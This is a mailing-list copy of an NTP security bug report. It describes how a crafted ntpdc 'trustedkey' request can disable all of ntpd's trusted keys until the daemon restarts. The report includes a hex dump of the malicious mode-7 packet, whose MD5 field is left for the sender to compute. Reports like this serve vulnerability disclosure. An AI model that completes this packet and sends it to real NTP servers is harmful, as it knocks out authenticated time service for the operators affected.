[ntp:security] [Bug 3003] New: "ntpdc -c trustedkey" could disable all the trustedkeys until ntpd restarted.

bugzilla-daemon at ntp.org bugzilla-daemon at ntp.org
Mon Feb 1 02:31:51 UTC 2016


http://bugs.ntp.org/show_bug.cgi?id=3003

             Bug #: 3003
           Summary: "ntpdc -c trustedkey" could disable all the
                    trustedkeys until ntpd restarted.
           Product: ntp
           Version: 4.2.8
          Platform: PC
        OS/Version: Linux
            Status: UNCONFIRMED
          Severity: normal
          Priority: P5
         Component: Security Bugs
        AssignedTo: stenn at ntp.org
        ReportedBy: LRlian at 163.com
                CC: security at ntp.org
    Classification: Unclassified


Command “ntpdc -c trustedkey AAAA” can’t be used now, but I can use these
packets to simulate it. 

17 80 03 21 00 01 00 08 41 41 41 41 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 DA 2B 86 11 09 1E B8 52
00 00 00 08 71 AA 5D 1B 92 C6 C9 D8 CB 76 5D CB
F8 D2 87 D9 (These red bits are wrong MD5 of other bits , in order to decrypt
succeed ,you need calculate it yourself.)

All the trusted keys will not be able to used unless ntpd server be restarted.

Details in attachment.

-- 
Configure bugmail: http://bugs.ntp.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are on the CC list for the bug.


More information about the security mailing list